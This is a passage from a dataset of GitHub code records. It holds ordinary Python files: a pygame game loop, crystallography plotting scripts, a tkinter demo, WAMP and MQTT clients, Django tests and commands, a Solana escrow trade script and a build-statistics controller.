s\n","repo_name":"gabrielok/Tower-of-Hanoi","sub_path":"pile.py","file_name":"pile.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32272840511","text":"import pygame\nimport class_game\nimport class_menu\n\npygame.init()\nwindow = pygame.display.set_mode((510,620))\nscreen = pygame.Surface((500,500))\nscreen.fill( (0,0,0) )\ngame = class_game.GAME()\ngame.init()\nmenu = class_menu.MENU()\nmenu.init(window, game.score)\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tFinished = True\n\t\t\tbreak\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_w:\n\t\t\t\tgame.direction = \"up\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_s:\n\t\t\t\tgame.direction = \"down\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_a:\n\t\t\t\tgame.direction = \"left\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_d:\n\t\t\t\tgame.direction = \"right\"\n\t\t\t\tgame.update()\n\t\t\t\tmenu.draw(game.score, window)\n\t\t\t\tbreak\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame.Finished = True\n\t\t\t\tbreak\n\tif game.Finished == True:\n\t\tbreak\n\twindow.blit(screen , (5,115) )\n\tgame.draw(screen)\n","repo_name":"kramlex/pygame-2048","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70761666404","text":"import numpy as np\nfrom matplotlib import pyplot, cm\nfrom scipy.optimize import minimize\nfrom scipy.special import erfinv\nfrom scipy.stats import norm\n\nfrom hikari.dataframes import HklFrame, ResFrame\nfrom hikari.symmetry import SG\nfrom hikari.utility import make_abspath\n\n\ndef baycon_plot(x_key='ze', y_key='si',\n a=10.0, b=10.0, c=10.0, al=90.0, be=90.0, ga=90.0,\n input_path='shelx.fcf',\n input_format='shelx_fcf',\n input_wavelength='MoKa',\n output_path='baycon.png'):\n \"\"\"\n For a given .fcf file prepare a bayesian conditional probability plot\n between x_key and y_key.\n\n :param x_key: Parameter of HklFrame which will be placed on x axis\n :type x_key: str\n :param y_key: Parameter of HklFrame which will be placed on x axis\n :type y_key: str\n :param a: Unit cell parameter *a* in Angstrom.\n :type a: float\n :param b: Unit cell parameter *b* in Angstrom.\n :type b: float\n :param c: Unit cell parameter *c* in Angstrom.\n :type c: float\n :param al: Unit cell parameter *alpha* in degrees.\n :type al: float\n :param be: Unit cell parameter *alpha* in degrees.\n :type be: float\n :param ga: Unit cell parameter *alpha* in degrees.\n :type ga: float\n :param input_path: Path to the input .fcf file.\n :type input_path: str\n :param input_format: Format of the input .fcf file. For reference see\n :meth:`hikari.dataframes.HklFrame.interpret_hkl_format`.\n :type input_format: int or str or dict\n :param input_wavelength: Wavelength of radiation utilised in experiment.\n :type input_wavelength: float or str\n :param output_path: Path to the output .png file.\n :type output_path: str\n \"\"\"\n no_of_bins = 10\n p = HklFrame()\n p.edit_cell(a=a, b=b, c=c, al=al, be=be, ga=ga)\n p.la = input_wavelength\n p.read(make_abspath(input_path), input_format)\n p.place()\n p.calculate_fcf_statistics()\n x = p.table.loc[:, x_key].rank(pct=True).to_numpy()\n y = p.table.loc[:, y_key].rank(pct=True).to_numpy()\n bins = np.zeros(shape=(no_of_bins, no_of_bins))\n lims = [-1.e-8] + [(i + 1) / no_of_bins for i in range(no_of_bins)]\n for i in range(no_of_bins):\n for j in range(no_of_bins):\n bins[i, j] = ((lims[i] < x) & (x <= lims[i+1]) &\n (lims[j] < y) & (y <= lims[j+1])).sum()\n n_avg = len(x) / no_of_bins ** 2\n chi2 = np.sum((bins - n_avg) ** 2 / n_avg)\n fig = pyplot.figure()\n ax = fig.add_subplot(111, aspect='equal')\n pyplot.xlim(0, 1)\n pyplot.ylim(0, 1)\n h = ax.hist2d(x, y, bins=no_of_bins, alpha=0.25, cmap=cm.get_cmap('PiYG'))\n cb = pyplot.colorbar(h[3], ax=ax)\n cb.set_label('Number of observations')\n ax.scatter(x=x, y=y, s=5.0, c='#000080', marker='.', alpha=0.75)\n pyplot.title('Bayesian CoNditional probability, chi2 = {:.2f}'.format(chi2))\n pyplot.xlabel('\"' + x_key + '\" rank')\n pyplot.ylabel('\"' + y_key + '\" rank')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef observed_vs_calculated_plot(input_path='shelx.fcf',\n input_format='shelx_fcf',\n output_path='Io_vs_Ic.png'):\n p = HklFrame()\n p.read(make_abspath(input_path), input_format)\n icalc = p.table.loc[:, 'Ic'].to_numpy()\n iobs = p.table.loc[:, 'I'].to_numpy()\n i_min = min(np.min(icalc[icalc > 0]), np.min(iobs[iobs > 0]))\n i_max = max(np.max(icalc[icalc > 0]), np.max(iobs[iobs > 0]))\n fig = pyplot.figure()\n ax = fig.add_subplot(111) # , aspect='equal'\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlim([i_min, i_max])\n ax.set_ylim([i_min, i_max])\n ax.plot(np.linspace(0, i_max), np.linspace(0, i_max), '-k', lw=1, zorder=0)\n ax.scatter(x=icalc, y=iobs, s=5.0, c='r', marker='.', alpha=0.75, zorder=10)\n pyplot.title('Calculated vs observed intensities plot')\n pyplot.xlabel('I_cal')\n pyplot.ylabel('I_obs')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef normal_probability_plot(input_path='shelx.fcf',\n input_format='shelx_fcf',\n output_path='Io_vs_Ic.png'):\n\n # scale factors\n a = 0.1000\n b = 0.0\n\n p = HklFrame()\n p.read(make_abspath(input_path), input_format)\n i_obs = p.table.loc[:, 'I'].to_numpy()\n i_calc = p.table.loc[:, 'Ic'].to_numpy()\n si = p.table.loc[:, 'si'].to_numpy()\n p = 1/3 * i_obs + 2/3 * i_calc\n si = np.sqrt(si ** 2 + (a * p) ** 2 + b * p)\n\n # expected delta m\n def delta_m(f1, f2, k, si1, si2):\n return np.sort((f1 - k * f2) / np.sqrt(si1 ** 2 + k **2 * si2 ** 2))\n\n def sum_of_delta_m_squared(k):\n return np.sum(delta_m(i_obs, i_calc, k, si, np.zeros_like(si)) ** 2)\n\n def scale_factor():\n return minimize(sum_of_delta_m_squared, x0=np.array([1.0])).x[0]\n\n experiment_delta_m = delta_m(f1=i_obs, f2=i_calc, k=scale_factor(),\n si1=si, si2=np.zeros_like(si))\n experiment_delta_m = experiment_delta_m / np.std(experiment_delta_m)\n\n # simulated delta m\n uniform = (np.arange(len(experiment_delta_m))+0.5) / len(experiment_delta_m)\n simulated_delta_m = [erfinv(-1 + 2 * q) for q in uniform]\n\n # drawing the plot\n fig = pyplot.figure()\n ax = fig.add_subplot(111, aspect='equal')\n ax.set_xlim([-5, 5])\n ax.set_ylim([-5, 5])\n pyplot.hist(experiment_delta_m, bins=100, density=True)\n ax.scatter(experiment_delta_m, simulated_delta_m, s=5.0, c='r', marker='.',\n alpha=0.75, zorder=10)\n ax.plot(np.linspace(-3, 3), np.linspace(-3, 3), '-k', lw=1, zorder=0)\n pyplot.plot(6 * uniform - 3, norm.pdf(6 * uniform - 3))\n pyplot.title('npp')\n pyplot.xlabel('delta_m experiment')\n pyplot.ylabel('delta_m simulated')\n pyplot.tight_layout()\n pyplot.savefig(fname=make_abspath(output_path), dpi=300)\n\n\ndef fcf_descriptors(input_path='shelx.fcf', input_format='shelx_fcf'):\n # scale factors\n a = 0.1000\n b = 0.0\n\n p = HklFrame()\n p.read(make_abspath(input_path), input_format)\n i_obs = p.table.loc[:, 'I'].to_numpy()\n i_calc = p.table.loc[:, 'Ic'].to_numpy()\n si = p.table.loc[:, 'si'].to_numpy()\n p = 1/3 * i_obs + 2/3 * i_calc\n si_weighted = np.sqrt(si ** 2 + (a * p) ** 2 + b * p)\n ze = (i_obs - i_calc) / si_weighted\n f_calc = np.sqrt(np.abs(i_calc)) * np.sign(i_calc)\n f_obs = np.sqrt(np.abs(i_obs)) * np.sign(i_obs)\n one_over_sf = (2 * abs(i_obs) ** 0.5) / si\n\n r1 = np.sum(np.abs(f_obs - f_calc)) / np.sum(np.abs(f_obs))\n wr2 = np.sqrt(\n np.sum(np.abs(si_weighted * np.abs(i_obs - i_calc) ** 2)) /\n np.sum(np.abs(si_weighted * i_obs ** 2)))\n awr2 = np.sqrt(\n (np.mean((i_obs - i_calc) ** 2) / np.mean(si_weighted ** 2)) /\n np.mean((i_obs / si_weighted) ** 2))\n gof_if_alpha_equal_one = np.sqrt(np.mean(ze ** 2))\n agof_if_alpha_equal_one = np.sqrt(\n np.mean((i_obs - i_calc) ** 2) /\n np.mean(si_weighted ** 2))\n\n print('R1 = {:f}'.format(r1))\n print('wR2 = {:f}'.format(wr2))\n print('awR2 = {:f}'.format(awr2))\n print('GoF* = {:f}'.format(gof_if_alpha_equal_one))\n print('aGoF* = {:f}'.format(agof_if_alpha_equal_one))\n\n\ndef calculate_sample_form_factors(a, b, c, al, be, ga, space_group, res_path):\n \"\"\"\n Estimate and print selected IAM XRD form factors for given crystal structure\n\n :param a: Unit cell parameter *a* in Angstrom.\n :type a: float\n :param b: Unit cell parameter *b* in Angstrom.\n :type b: float\n :param c: Unit cell parameter *c* in Angstrom.\n :type c: float\n :param al: Unit cell parameter *alpha* in degrees.\n :type al: float\n :param be: Unit cell parameter *alpha* in degrees.\n :type be: float\n :param ga: Unit cell parameter *alpha* in degrees.\n :type ga: float\n :param space_group: Short Hermann-Mauguin name or index of space group.\n For details see table in hikari.symmetry.space_groups.\n :type space_group: str or int\n :param res_path: Absolute or relative path to the input .res file.\n :type res_path: str\n :return: None\n :rtype: None\n \"\"\"\n r = ResFrame()\n r.read(make_abspath(res_path))\n r.edit_cell(a=a, b=b, c=c, al=al, be=be, ga=ga)\n hkl = np.array([(0, 0, 0), (1, 1, 1), (2, 2, 2), (2, 0, 0), (0, 0, 3),\n (1, 0, 1), (1, 1, 8), (5, 0, 2), (4, 4, 0), (2, 0, 6),\n (2, 0, 1), (2, 0, 2), (2, 0, 3), (2, 0, 4), (2, 0, 5),\n (5, 9, 9), (0, 0, 10), (0, 2, 10), (0, 4, 10)])\n f = r.form_factor(np.array(hkl), SG[space_group])\n f2 = f * np.conj(f)\n for _hkl, _f, _f2 in zip(hkl, f, f2):\n print(f'{_hkl}: {_f2:12f} --- {_f}')\n\n\nif __name__ == '__main__':\n # calculate_sample_form_factors(a=5.64109, b=5.64109, c=5.64109,\n # al=90, be=90, ga=90, space_group='Fm-3m',\n # res_path='~/x/NaCl/cifmaking/NaCl_more_res.res')\n calculate_sample_form_factors(a=7.210241, b=16.487567, c=11.279203,\n al=90, be=90, ga=90, space_group='Pnma',\n res_path='~/x/HP/2oAP/_/_.res')\n","repo_name":"Baharis/hikari","sub_path":"hikari/scripts/fcf.py","file_name":"fcf.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71507357606","text":"from tkinter import *\r\n\r\n\r\ndef fun():\r\n if v.get() == 1:\r\n lblL.configure(text='You pressed radiobutton 1')\r\n else:\r\n lblL.configure(text='You pressed radiobutton 2')\r\n\r\n\r\nroot = Tk()\r\n\r\nv = IntVar()\r\nRadiobutton(root, text='DIT', variable=v, \\\r\n value=1, command=fun).pack(anchor=W)\r\nRadiobutton(root, text='UIT', variable=v, \\\r\n value=2, command=fun).pack(anchor=W)\r\n\r\nlblL = Label(root)\r\nlblL.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"bansalkanav/python_notes","sub_path":"16. GUI-2/demo_4.py","file_name":"demo_4.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"52"} +{"seq_id":"15919469711","text":"from json import loads\nfrom typing import Dict\n\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom twisted.internet.defer import inlineCallbacks\n\nfrom Actuators import Actuators\n\n\nclass AppSession(ApplicationSession):\n\n def onConnect(self):\n self.join(self.config.realm, [u\"ticket\"], crossbar.get('ticket'))\n\n def onChallenge(self, challenge):\n if challenge.method == u\"ticket\":\n return crossbar.get('ticket')\n else:\n raise Exception(\"Invalid authmethod {}\".format(challenge.method))\n\n @inlineCallbacks\n def onJoin(self, details):\n for id, callback in actuators.on_join():\n yield self.register(callback, crossbar['prefix'] + '.actuator.' + id)\n\n\nif __name__ == '__main__':\n try:\n with open('env.json', 'r') as f:\n conf = loads(f.read())\n except Exception as e:\n raise e\n actuators = Actuators(conf.get('actuators', []))\n\n if conf.get('crossbar') is None:\n raise Exception(\"Crossbar config is required\")\n crossbar: Dict[str, str] = conf.get('crossbar')\n aux = crossbar.get('host').split('.')\n aux.reverse()\n crossbar.update({\n 'prefix': '.'.join(aux)\n })\n del aux\n url = 'ws://' + crossbar.get('host', '127.0.0.1') + '/ws'\n runner = ApplicationRunner(url, 'realm1')\n runner.run(AppSession, auto_reconnect=True)\n","repo_name":"pedromneto97/Raspberry-Light-Control","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17564595785","text":"'''\nCreated on Jan 25, 2020\n\n@author: Taffarello\n'''\nimport unittest\nfrom models import database\nimport ambar\nfrom sqlalchemy import create_engine\nfrom flask import Flask\nimport json\nfrom models.cidadeModel import CidadeModel\nfrom application import cidadeController \n\n\nTEST_DB = 'unittest.db'\n\nclass CidadeControllerTests(unittest.TestCase):\n def setUp(self):\n ambar.app.config['TESTING'] = True\n ambar.app.config['WTF_CSRF_ENABLED'] = False\n ambar.app.config['DEBUG'] = False\n ambar.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+ TEST_DB\n \n self.client = ambar.app.test_client()\n \n engine = create_engine(ambar.app.config['SQLALCHEMY_DATABASE_URI'])\n database.Session.configure(bind=engine) \n database.Base.metadata.drop_all(engine)\n database.Base.metadata.create_all(engine)\n \n # Disable sending emails during unit testing\n #ambar.mail.init_app(ambar.app)\n self.assertEqual(ambar.app.debug, False)\n \n def test_getCidadeInexistente(self):\n dados = {'name': 'Test','state' : 'sp', 'country':'braz','id':555}\n session = database.Session()\n cidade = cidadeController.getCidade(dados['id'], dados,session) \n self.assertEqual(cidade.id, dados['id'], 'recuperando cidade do banco')\n self.assertEqual(cidade.nome, dados['name'], 'recuperando cidade do banco')\n self.assertEqual(cidade.estado, dados['state'], 'recuperando cidade do banco')\n self.assertEqual(cidade.pais, dados['country'], 'recuperando cidade do banco')\n \n def test_getCidadeExistente(self):\n dados = {'name': 'Test','state' : 'sp', 'country':'braz','id':999}\n session = database.Session()\n cidadeController.getCidade(dados['id'], dados,session)\n session.commit()\n cidade = cidadeController.getCidade(dados['id'], dados,session) #fazendo duas vezes para simular uma cidade já cadastrada\n \n self.assertEqual(cidade.id, dados['id'], 'recuperando cidade do banco')\n self.assertEqual(cidade.nome, dados['name'], 'recuperando cidade do banco')\n self.assertEqual(cidade.estado, dados['state'], 'recuperando cidade do banco')\n self.assertEqual(cidade.pais, dados['country'], 'recuperando cidade do banco')\n\n \nif __name__ == \"__main__\":\n unittest.main() \n ","repo_name":"andretaff/ambar","sub_path":"source/tests/tests_cidadeController.py","file_name":"tests_cidadeController.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25960220195","text":"import paho.mqtt.client as mqtt\nfrom threading import Thread\nimport json\n\n\nclass MqttClient(Thread):\n def __init__(self, name, client_uid, topics, publish_topic, thread_q):\n Thread.__init__(self)\n Thread.daemon = True\n self.name = name\n self.connected = False\n self.cached_data_to_file = False\n self.topics = topics\n self.client_uid = client_uid\n self.publish_topic = publish_topic\n self.thread_q = thread_q\n self.cache_file_handler = open(\"cache_file\", \"a+\")\n\n def run(self):\n self.client.loop_forever()\n\n def on_message_handler(self, client, user_data, msg):\n # print(\"new message\", msg.payload)\n # set the data onto the shared queue for consumers to use it\n self.thread_q.put(msg.payload)\n\n def on_connect_handler(self, client, user_data, flags, return_code):\n if return_code == 0:\n print(self.name + \" Connected with result code \" + str(return_code))\n self.connected = True\n self.subscribe()\n if self.cached_data_to_file == True:\n self.__send_cached_frames()\n\n def on_subscribe_handler(self, client, obj, mid, granted_ops):\n print(self.name + \" subscribed to topic\", str(mid))\n\n def on_publish_handler(self, client, userdata, result):\n print(\"data published\\n\")\n\n def on_disconnect_handler(self, client, userdata, rc):\n self.connected = False\n print(self.name + \" disconnected from broker\")\n\n def create_client(self):\n self.client = mqtt.Client(\n client_id=self.name, clean_session=True)\n\n def subscribe(self):\n self.client.subscribe(self.topics)\n\n # publisher\n def publish_data(self, json_in_str):\n if self.connected:\n # connected so send it over mqtt\n self.client.publish(self.publish_topic, json_in_str)\n print(\"Sent frame to server\")\n else:\n # print(json_in_str)\n self.cached_data_to_file = True\n self.cache_file_handler.write(json_in_str + \"\\n\")\n self.cache_file_handler.flush()\n print(\"Cached frame in file\")\n\n def __send_cached_frames(self):\n print(\"Running internal function to send cache frames to server\")\n # print(self.connected)\n if self.connected:\n lines_from_file = open(\"cache_file\", \"r\").read()\n lines_from_file_split = lines_from_file.split(\"\\n\")\n # print(lines_from_file_split)\n # remove last empty string character '' from the split function\n lines_from_file_split.pop()\n lines_from_file_split = [json.loads(\n i) for i in lines_from_file_split]\n frame_array_to_send = {\"cached_frames\": lines_from_file_split}\n # connected send it over mqtt\n # print(json.dumps(frame_array_to_send))\n self.client.publish('cache_frame_topic',\n json.dumps(frame_array_to_send))\n self.cached_data_to_file = False\n # reset the file/ truncate it\n self.cache_file_handler.seek(0, 0)\n self.cache_file_handler.truncate()\n print(\"sent cached frames to server\")\n else:\n print(\"Still no internet, continuing caching of frames to file\")\n","repo_name":"itspa1/shop-analytics-pi","sub_path":"mqttClient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"41706640834","text":"# -*- coding: utf-8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom magi.utils import LANGUAGES_DICT\nfrom magi.management.commands.populate_staffconfigurations import create\nfrom magi import models as magi_models\nfrom magi.urls import RAW_CONTEXT\nfrom starlight import models\n\nclass Command(BaseCommand):\n can_import_settings = True\n\n def handle(self, *args, **options):\n\n ##################################\n # Non translatable\n\n for rarity in models.Card.RARITIES.keys():\n create({\n 'key': u'rarity_{}_cost'.format(rarity),\n 'verbose_key': u'Cost of a card rarity {}'.format(rarity),\n })\n create({\n 'key': u'memoir_rarity_{}_cost'.format(rarity),\n 'verbose_key': u'Cost of a memoir rarity {}'.format(rarity),\n })\n\n create({\n 'key': 'max_level',\n 'verbose_key': 'Max level',\n })\n\n ##################################\n # Fill up default values\n\n magi_models.StaffConfiguration.objects.update_or_create(\n key='get_started', i_language='en',\n defaults={\n 'value': u\"\"\"# Start sharing your collection of cards!\n\n1. Open the game, then:\n - Tap ![]({static_url}img/get_started_settings.png) **Other** (\"その他\")\n - Tap ![]({static_url}img/get_started_gallery.png) **Gallery** (\"ギャラリー\")\n - Tap ![]({static_url}img/get_started_stage_girls.png) **Stage Girls** (\"舞台少女\").\n2. Tap the sorting button (top right) and sort by **ID**.\n3. Go through the list of cards below and click \"+\" on the ones you have to add them to your Starlight Academy collection!\n\n*For more options, go to your profile or the [list of cards](/cards/).*\n\"\"\".format(\n static_url=RAW_CONTEXT['static_url'],\n),\n })\n","repo_name":"MagiCircles/RevueStarlight","sub_path":"starlight/management/commands/populate_staffconfigurations_starlight.py","file_name":"populate_staffconfigurations_starlight.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"5412878466","text":"from solana.rpc.async_api import AsyncClient\nimport json\nfrom spl.token.constants import TOKEN_PROGRAM_ID\nfrom solana.publickey import PublicKey\nfrom solana.keypair import Keypair\nfrom solana.transaction import TransactionInstruction, AccountMeta, Transaction\nfrom solana.rpc.commitment import Confirmed\nimport asyncio\nfrom solders.pubkey import Pubkey # type: ignore\nfrom utils import (\n get_account_info,\n ESCROW_ACCOUNT_SCHEMA,\n EscrowProgramClass,\n construct_payload,\n EscrowInstructions,\n)\nfrom pprint import pprint as pp\nfrom tabulate import tabulate\n\n\nasync def take_trade():\n client = AsyncClient(\"http://localhost:8899\", commitment=Confirmed)\n keys = json.load(open(\"keys.json\", \"r\"))\n config = json.load(open(\"config.json\", \"r\"))\n program_id = PublicKey(config[\"program_id\"])\n expected_amount = config[\"initlizer_expected_ammount\"]\n taker_wallet = PublicKey(keys[\"taker_wallet\"])\n taker_y_account = PublicKey(keys[\"taker_y_account\"])\n taker_x_account = PublicKey(keys[\"taker_x_account\"])\n escrow_account = PublicKey(keys[\"escrow_account\"])\n initlizer_x_account = PublicKey(keys[\"initializer_x_account\"])\n\n account_info: EscrowProgramClass = await get_account_info(\n escrow_account, ESCROW_ACCOUNT_SCHEMA, client\n )\n initlizer_y_account = Pubkey.from_bytes(\n account_info.initializer_token_to_receive_account_pubkey\n )\n initlizer_wallet = Pubkey.from_bytes(account_info.initializer_pubkey)\n temp_token_account = Pubkey.from_bytes(account_info.temp_token_account_pubkey)\n pda, _ = PublicKey.find_program_address(\n [bytes(\"escrow\", encoding=\"utf8\")], program_id\n )\n take_trade_ix = TransactionInstruction(\n keys=[\n AccountMeta(taker_wallet, is_signer=True, is_writable=False),\n AccountMeta(taker_y_account, is_signer=False, is_writable=True),\n AccountMeta(taker_x_account, is_signer=False, is_writable=True),\n AccountMeta(\n PublicKey(temp_token_account), is_signer=False, is_writable=True\n ),\n AccountMeta(PublicKey(initlizer_wallet), is_signer=False, is_writable=True),\n AccountMeta(\n PublicKey(initlizer_y_account), is_signer=False, is_writable=True\n ),\n AccountMeta(escrow_account, is_signer=False, is_writable=True),\n AccountMeta(TOKEN_PROGRAM_ID, is_signer=False, is_writable=False),\n AccountMeta(pda, is_signer=False, is_writable=False),\n ],\n program_id=program_id,\n data=construct_payload(EscrowInstructions.EXCHANGE, expected_amount),\n )\n taker_keypair = Keypair.from_secret_key(\n bytes(keys[\"taker_wallet_secret\"].encode(\"latin-1\"))\n )\n tx = Transaction().add(take_trade_ix)\n\n transaction = await client.send_transaction(tx, taker_keypair)\n await client.confirm_transaction(transaction.value)\n data= [[(await client.get_token_account_balance(initlizer_x_account)).value.amount,\n (await client.get_token_account_balance(PublicKey(initlizer_y_account))).value.amount,\n (await client.get_token_account_balance(taker_x_account)).value.amount,\n (await client.get_token_account_balance(taker_y_account)).value.amount]]\n\n print(tabulate(data,headers=[\"initlizer x account\", \"initlizer y account\", \"taker x account\", \"taker y account\"]))\n print(\"✨Trade successfully executed. All temporary accounts closed✨\\n\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(take_trade())\n","repo_name":"adam1231231/escrow-program-solana","sub_path":"testing-scripts/escrow_taker_transaction.py","file_name":"escrow_taker_transaction.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12533757785","text":"from __future__ import print_function\n\nimport collections\n\nfrom django.db import models\nfrom django.db.models import query\n\nfrom build_annotations import models as ba_models\n\n# We need to fake out some system modules before importing chromite modules.\nfrom cq_stats import fake_system_modules # pylint: disable=unused-import\nfrom chromite.lib import clactions\n\n\nclass BuildRow(collections.MutableMapping):\n \"\"\"A database \"view\" that collects all relevant stats about a build.\"\"\"\n\n def __init__(self, build_entry, build_stage_entries,\n cl_action_entries, failure_entries, annotations,\n costly_annotations_qs):\n \"\"\"Initialize a BuildRow.\n\n Do not use QuerySets as arguments. All query sets must have been evaluated\n before creating this object. All data manipulation within this object is\n pure python.\n\n All non-trivial computation on this object should be lazy: Defer it to\n property getters.\n \"\"\"\n assert not isinstance(build_entry, query.QuerySet)\n assert not isinstance(build_stage_entries, query.QuerySet)\n assert not isinstance(cl_action_entries, query.QuerySet)\n assert not isinstance(failure_entries, query.QuerySet)\n\n self._data = {}\n\n self.build_entry = build_entry\n self._build_stage_entries = build_stage_entries\n self._cl_action_entries = cl_action_entries\n self._failure_entries = failure_entries\n\n # The readonly data is accessible from this object as dict entries.\n self['id'] = self.build_entry.id\n self['build_number'] = self.build_entry.build_number\n self['status'] = self.build_entry.status\n self['summary'] = self.build_entry.summary\n self['start_time'] = self.build_entry.start_time\n if (self.build_entry.finish_time is not None and\n self['start_time'] is not None):\n self['run_time'] = self.build_entry.finish_time - self['start_time']\n else:\n self['run_time'] = None\n if self['start_time'] is not None:\n self['weekday'] = (self['start_time'].date().weekday() != 6)\n else:\n self['weekday'] = None\n self['chromeos_version'] = self.build_entry.full_version\n self['chrome_version'] = self.build_entry.chrome_version\n self['waterfall'] = self.build_entry.waterfall\n self['builder_name'] = self.build_entry.builder_name\n\n failed_stages = [x.name for x in build_stage_entries if\n x.status == x.FAIL]\n self['failed_stages'] = ', '.join(failed_stages)\n self['picked_up_count'] = self._CountCLActions(\n ba_models.ClActionTable.PICKED_UP)\n self['submitted_count'] = self._CountCLActions(\n ba_models.ClActionTable.SUBMITTED)\n self['kicked_out_count'] = self._CountCLActions(\n ba_models.ClActionTable.KICKED_OUT)\n self['annotation_summary'] = self._SummaryAnnotations(annotations)\n self._costly_annotations_qs = costly_annotations_qs\n\n def GetAnnotationsQS(self):\n \"\"\"Return the queryset backing annotations.\n\n Executing this queryset is costly because there is no way to optimize the\n query execution.\n Since this is a related_set queryset, that was further filtered, each item\n in the queryset causes a db hit.\n \"\"\"\n return self._costly_annotations_qs\n\n def __getitem__(self, *args, **kwargs):\n return self._data.__getitem__(*args, **kwargs)\n\n def __iter__(self, *args, **kwargs):\n return self._data.__iter__(*args, **kwargs)\n\n def __len__(self, *args, **kwargs):\n return self._data.__len__(*args, **kwargs)\n\n def __setitem__(self, *args, **kwargs):\n return self._data.__setitem__(*args, **kwargs)\n\n def __delitem__(self, *args, **kwargs):\n return self._data.__delitem__(*args, **kwargs)\n\n def _CountCLActions(self, cl_action):\n actions = [x for x in self._cl_action_entries if x.action == cl_action]\n return len(actions)\n\n def _SummaryAnnotations(self, annotations):\n if not annotations:\n return ''\n\n result = '%d annotations: ' % len(annotations)\n summaries = []\n for annotation in annotations:\n summary = annotation.failure_category\n failure_message = annotation.failure_message\n blame_url = annotation.blame_url\n if failure_message:\n summary += '(%s)' % failure_message[:30]\n elif blame_url:\n summary += '(%s)' % blame_url[:30]\n summaries.append(summary)\n\n result += '; '.join(summaries)\n return result\n\n\nclass BuildRowController(object):\n \"\"\"The 'controller' class that collates stats for builds.\n\n More details here.\n Unit-test this class please.\n \"\"\"\n\n DEFAULT_NUM_BUILDS = 30\n\n def __init__(self):\n self._latest_build_id = 0\n self._build_rows_map = {}\n\n\n def GetStructuredBuilds(self, latest_build_id=None,\n num_builds=DEFAULT_NUM_BUILDS, extra_filter_q=None):\n \"\"\"The primary method to obtain stats for builds\n\n Args:\n latest_build_id: build_id of the latest build to query.\n num_builds: Number of build to query.\n extra_filter_q: An optional Q object to filter builds. Use GetQ* methods\n provided in this class to form the filter.\n\n Returns:\n A list of BuildRow entries for the queried builds.\n \"\"\"\n # If we're not given any latest_build_id, we fetch the latest builds\n if latest_build_id is not None:\n build_qs = ba_models.BuildTable.objects.filter(id__lte=latest_build_id)\n else:\n build_qs = ba_models.BuildTable.objects.all()\n\n if extra_filter_q is not None:\n build_qs = build_qs.filter(extra_filter_q)\n build_qs = build_qs.order_by('-id')\n build_qs = build_qs[:num_builds]\n\n # Critical for performance: Prefetch all the join relations we'll need.\n build_qs = build_qs.prefetch_related('buildstagetable_set')\n build_qs = build_qs.prefetch_related('clactiontable_set')\n build_qs = build_qs.prefetch_related(\n 'buildstagetable_set__failuretable_set')\n build_qs = build_qs.prefetch_related('annotationstable_set')\n\n # Now hit the database.\n build_entries = [x for x in build_qs]\n\n self._build_rows_map = {}\n build_rows = []\n for build_entry in build_entries:\n build_stage_entries = [x for x in build_entry.buildstagetable_set.all()]\n cl_action_entries = [x for x in build_entry.clactiontable_set.all()]\n failure_entries = []\n for entry in build_stage_entries:\n failure_entries += [x for x in entry.failuretable_set.all()]\n # Filter in python, filter'ing the queryset changes the queryset, and we\n # end up hitting the database again.\n annotations = [a for a in build_entry.annotationstable_set.all() if\n a.deleted == False]\n costly_annotations_qs = build_entry.annotationstable_set.filter(\n deleted=False)\n\n build_row = BuildRow(build_entry, build_stage_entries, cl_action_entries,\n failure_entries, annotations, costly_annotations_qs)\n\n self._build_rows_map[build_entry.id] = build_row\n build_rows.append(build_row)\n\n if build_entries:\n self._latest_build_id = build_entries[0].id\n\n return build_rows\n\n def GetHandlingTimeHistogram(self, latest_build_id=None,\n num_builds=DEFAULT_NUM_BUILDS,\n extra_filter_q=None):\n \"\"\"Get CL handling time histogram.\"\"\"\n # If we're not given any latest_build_id, we fetch the latest builds\n if latest_build_id is not None:\n build_qs = ba_models.BuildTable.objects.filter(id__lte=latest_build_id)\n else:\n build_qs = ba_models.BuildTable.objects.all()\n\n if extra_filter_q is not None:\n build_qs = build_qs.filter(extra_filter_q)\n build_qs = 